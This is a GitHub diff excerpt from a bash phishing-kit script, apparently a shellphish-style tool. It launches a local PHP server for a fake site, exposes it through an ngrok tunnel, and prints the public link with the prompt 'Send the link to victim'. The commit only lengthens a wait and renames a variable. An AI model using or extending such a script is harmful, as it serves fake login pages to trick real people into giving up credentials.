File tree Expand file tree Collapse file tree 1 file changed +4
-3
lines changed Expand file tree Collapse file tree 1 file changed +4
-3
lines changed Original file line number Diff line number Diff line change @@ -320,12 +320,13 @@ printf "\e[96m[\e[0m\e[1;77m~\e[96m]\e[0m\e[1;92m Launching Ngrok ..\e[0m\n"
320320cd websites/$server && php -S 127.0.0.1:5555 > /dev/null 2>&1 &
321321sleep 2
322322./ngrok http 5555 > /dev/null 2>&1 &
323- sleep 7
323+ sleep 10
324324
325- ngrok_link =$( curl -s -N http://127.0.0.1:4041/api/tunnels | grep -o " https://[0-9a-z]*\.ngrok.io" )
326- printf " \n\e[96m[\e[0m\e[1;77m~\e[96m]\e[0m\e[1;96m Send the link to victim :\e[0m\e[1;93m %s \n" $ngrok_link
325+ link =$( curl -s -N http://127.0.0.1:4041/api/tunnels | grep -o " https://[0-9a-z]*\.ngrok.io" )
326+ printf " \n\e[96m[\e[0m\e[1;77m~\e[96m]\e[0m\e[1;96m Send the link to victim :\e[0m\e[1;93m %s \n" $link
327327found
328328}
329+
329330start_local (){
330331def_port=" 5555"
331332printf " \e[0m\n"
You can’t perform that action at this time.
0 commit comments